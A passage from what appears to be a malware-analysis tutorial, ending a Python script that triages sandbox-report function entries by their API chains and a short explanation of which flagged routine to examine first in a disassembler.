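                     re.MULTILINE)


def parse_code_functions(report_text):
    """Return [(address, [api, ...])] from 'Code function:' lines that list an API chain."""
    out = []
    for m in FUNC_RE.finditer(report_text):
        out.append((m.group("addr"), [a for a in m.group("chain").split(",") if a]))
    return out


def classify(chain):
    """'crt' with the routine name for known runtime sequences, else 'review' with priority."""
    label = CRT_SEQUENCES.get(tuple(chain))
    if label:
        return {"verdict": "crt", "note": label, "priority": "none"}
    hv = sorted(HIGH_VALUE_APIS.intersection(chain))
    return {"verdict": "review", "note": ", ".join(hv) or "no high-value API",
            "priority": "high" if hv else "low"}


def triage_report(report_text):
    """Map every listed function address to its verdict."""
    return {addr: classify(chain) for addr, chain in parse_code_functions(report_text)}


if __name__ == "__main__":
    for addr, r in triage_report(SAMPLE_LINES).items():
        print(f"{addr}  {r['verdict']:6}  {r['priority']:4}  {r['note']}")
```

On the sample lines four of the six functions fold into the runtime and only `0_2_6BEE1B85` comes out high priority: a directory walk (`FindFirstFileW` / `FindNextFileW`) that copies a file and terminates processes is the routine that tells you what the sample does, and it is the one to open first in the disassembler.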